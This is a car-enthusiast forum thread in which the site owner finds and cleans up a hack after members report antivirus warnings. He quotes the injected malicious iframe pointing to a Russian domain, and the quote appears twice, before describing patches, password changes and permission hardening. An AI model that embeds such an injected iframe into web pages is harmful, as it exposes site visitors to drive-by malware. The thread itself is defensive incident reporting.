Jump to content
Mopar1973Man.Com LLC
  • Welcome To Mopar1973Man.Com LLC

    We are a privately owned support forum for the Dodge Ram Cummins Diesels. All information is free to read for everyone. To interact or ask questions you must have a subscription plan to enable all other features beyond reading. Please go over to the Subscription Page and pick out a plan that fits you best. At any time you wish to cancel the subscription please go back over to the Subscription Page and hit the Cancel button and your subscription will be stopped. All subscriptions are auto-renewing. 

Recommended Posts

Posted

Alright, so I'm starting to get warnings, alerts, blocks to the site. I have had windows defender and AVG warn me that the site is unsafe and it could potentially reveal personal or financial information. AVG gave me a 1889 number.Mike, might be time to look into this...

  • Owner
Posted

Google report no malware.There is only 2 pieces of software here. vBulletin 4.2.0 and Joomla 2.5.3 which haven't changed in over 6-9 months. I'm waiting for the vBulletin 4.2.1 update before doing the up Joomla 2.5.6 update.Maybe you need to Linux there no such thing as malware over here. :lol:

  • Owner
Posted

Could someone post this error and what its saying. So I can investigate it more since 2 people now see it. I personally think is a fluke and poor definitions on AVG part.If its particular URL's or pages please list them too.Here is my check.

post-2-138698193881_thumb.jpg

Posted

Mike,

Can you receive text with pics on the listed number? I have a picture of it to send to you.

- - - Updated - - -

Nevermind, I will get it on here.

- - - Updated - - -

Here you go. I am a member on a local site that had the same issue awhile back, I am friends with the owner of it and I will try to make contact with him to see if there was a fix or a problem for that matter.

Posted Image

  • Owner
Posted

Site has been hacked... :banghead: But I got the code out of it.

<iframe src="http://lemonadiom.ru:8080/forum/links/news.php"></iframe>
If you run across more let me know. I'm going to call my hosting provider. UPDATE: Nothing basically they can do they assume its a weakness in my site somewhere and need to update everything. Yes my Joomla is a few sub versions behind and the vBulletin is due for 4.2.1 as soon as its released. So hang in tight gang.. Please give me any information if you find more...
Posted

Site has been hacked... :banghead: But I got the code out of it.

<iframe src="http://lemonadiom.ru:8080/forum/links/news.php"></iframe>
If you run across more let me know. I'm going to call my hosting provider. UPDATE: Nothing basically they can do they assume its a weakness in my site somewhere and need to update everything. Yes my Joomla is a few sub versions behind and the vBulletin is due for 4.2.1 as soon as its released. So hang in tight gang.. Please give me any information if you find more...
SEE! I'm not crazy! :tease:
  • Owner
Posted

SEE! I'm not crazy! :tease:

Ok... So I'm busted... UPDATE: Installing vB 4.2.0 Patch level 3. I think they gain entry through the Joomla and managed to hack the index.htm. But Also the article database is ringing red flags too so I assume that where the hacker managed to get in. So I'll get the update hammer into that next. I'm going to work hard and long tonight to harden the site up again. (#%&) Hackers... Grrr...
  • Owner
Posted

UPDATE: Both vBulletin (4.2.0 PL3) and Joomla (2.5.7) are up to date as of now. articles.mopar1973man.com Joomla still reports two issues with crashing PHP files but no malware detected. http://sitecheck.sucuri.net/results/articles.mopar1973man.com forum.mopar1973man.com - Reports clean - http://sitecheck.sucuri.net/results/forum.mopar1973man.com www.mopar1973man.com - Reports Clean - http://sitecheck.sucuri.net/results/www.mopar1973man.com srrfd.mopar1973man.com - Reports Clean - http://sitecheck.sucuri.net/results/srrfd.mopar1973man.com Let me know gang... Thank you guys for reporting this. I just never thought I would be a target for hackers but I guess its time to thank my lucky stars it was mild and nothing out outrageous occurred. So I'll be putting everything else on the back burner for now and putting priority on site security and going to harden the server even more. Dang Hackers... Where is my virtual 9mm's??? :gun::mad:

  • Owner
Posted

Russ its just like my Google Webmaster scan were clean too. But once 2 people come forward claiming the same thing and showing me the same problem with 2 different softwares now I've got a problem and have to act. Someone manage to inject that small piece code that suppose to carry a payload of malware. Once again since I'm already on Ubuntu Linux and so is the site neither one can directly see the payload nor can be effected by the payload. But you Windows user would be affect by it. So like what occurred I acted when 2 came forward claiming the same issues.

  • Owner
Posted

Well I've been over this server with a fine toothed comb and I'm pretty sure I closed up any holes so far. Changed a few file security permissions to hopefully thwart any would-be hacker from trying that same stunt twice.Also going to perfect my backup system a bit more to get copies of the site on a regular basis.

  • Owner
Posted

Ok gang. There will be some serious changes made to the site. Mostly things you guys can't see but I can. Like I'm going to be changing all the passwords to the MySQL databases, hosting passwords, FTP passwords, etc. I'm going to go for super strength stuff here. (64 character or better!) Yes it going to long ones. The kind of stuff you create a text file and cut and paste them back and forth.As for the forum I'll bee changing a few folders around to prevent hackers from figuring out where the control panels are for the staff and myself.Then I'll be double checking all the file permissions to be sure there wasn't a folder or file left open to the public to read/write to by accident.

  • Like 1
  • Owner
Posted

Ok Gang... (Whew!) I managed to change all the passwords on the site. Every MySQL database has a different password now. Even the FTP login for myself has been changed. Been through most all the files and got most of them changed to tighter security policies of read only for most. Double check all the configuration files to be sure they are not public readable. (404 page error). If there is any problems that pop up because of changes please let me know. I might of over tighten the leash... :rolleyes:

keep that file on a thumbdrive only, thats secure! :) thanks again mr IT man!!!

How about burning it to a DVD-RW and calling it good.. :wink:
×
×
  • Create New...